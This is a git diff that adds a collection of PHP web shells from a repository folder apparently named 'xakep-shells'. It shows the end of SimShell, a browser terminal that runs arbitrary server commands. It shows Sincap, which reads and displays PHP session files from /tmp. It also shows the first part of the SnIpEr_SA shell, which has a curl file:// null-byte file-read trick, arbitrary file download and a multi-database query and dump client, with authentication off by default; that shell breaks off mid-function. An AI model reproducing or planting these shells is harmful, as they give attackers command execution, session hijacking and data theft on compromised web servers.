+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Sincap.php.php.txt b/xakep-shells/PHP/Sincap.php.php.txt
new file mode 100644
index 0000000..96ff07a
--- /dev/null
+++ b/xakep-shells/PHP/Sincap.php.php.txt
@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B�ce�i&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) B�ce�i</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Ad�</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    De�eri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+
diff --git a/xakep-shells/PHP/SnIpEr_SA Shell.php.txt b/xakep-shells/PHP/SnIpEr_SA Shell.php.txt
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/xakep-shells/PHP/SnIpEr_SA Shell.php.txt	
@@ -0,0 +1,2246 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ �������� | Options  ~~~ */
+
+// ����� | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - ������ ������ ����� ������  ( authentification = On  )
+// $auth = 0; - ������ ������ ����� ������ ( authentification = Off )
+$auth = 0;
+
+// ����� ����� ���� ���� ������ (Login & Password for access)
+// ������ ������� �� ���� ���� ��� ������!!! (CHANGE THIS!!!)
+// ��� ���� ���� ������ ��� ����� ����� md5, ������ ������ ��� ��  'r57'
+// ������� �� ���� ���� ����� ���� �������� ����� md5 ������ �� ������� �������
+$name='ec371748dc2da624b35a4f8f685dd122'; // ��� ��������  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ���� ������ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
